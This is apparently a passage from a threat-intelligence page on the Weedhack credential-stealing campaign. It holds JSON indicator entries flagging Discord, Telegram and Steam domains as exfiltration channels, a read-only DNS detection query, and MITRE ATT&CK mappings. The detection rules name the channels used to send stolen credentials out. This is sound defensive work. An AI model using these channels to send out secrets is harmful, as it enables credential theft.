"description": "Exfiltration channel used by Weedhack campaign for stolen credential delivery via Discord webhooks",
"severity": "medium",
"action": "detect",
"platforms": [
"windows",
"mac",
"linux"
],
"applied_globally": true,
"expiration": "2026-09-02T00:00:00Z"
},
{
"type": "domain",
"value": "steamcommunity.com",
"source": "SCC Threat Intel",
"description": "Exfiltration channel used by Weedhack campaign via Steam API",
"severity": "medium",
"action": "detect",
"platforms": [
"windows",
"mac",
"linux"
],
"applied_globally": true,
"expiration": "2026-09-02T00:00:00Z"
}
]
Route 53 DNS — Malicious Domain Resolution
Query Preview
Read-only — detection query only
fields @timestamp, qname, srcaddr, rcode
| filter qname in ["api.telegram.org", "cdn.discordapp.com", "steamcommunity.com"]
| sort @timestamp desc
| limit 200
Compliance Framework Mappings
T1113
T1091
T1059.001
T1125
T1041
T1090
+19
CM-7
SI-3
SI-4
SI-7
CA-7
SC-7
+4
MITRE ATT&CK Mapping
T1113
Screen Capture
collection
T1091
Replication Through Removable Media
lateral-movement
T1125
Video Capture
collection
T1041
Exfiltration Over C2 Channel
exfiltration
T1090
Proxy
command-and-control
T1566
Phishing
initial-access
T1547
Boot or Logon Autostart Execution
persistence
T1055
Process Injection
defense-evasion
T1562.001
Disable or Modify Tools
defense-evasion
T1027
Obfuscated Files or Information
defense-evasion
T1553
Subvert Trust Controls
defense-evasion
T1496
Resource Hijacking
impact
T1608.001
Upload Malware
resource-development
T1539
Steal Web Session Cookie
credential-access
T1112
Modify Registry
defense-evasion
T1555
Credentials from Password Stores
credential-access
T1071
Application Layer Protocol
command-and-control
T1115
Clipboard Data
collection
Free Template
AI Security Policy Template
Professional policy template for AI governance teams. $15.
Guidance Disclaimer
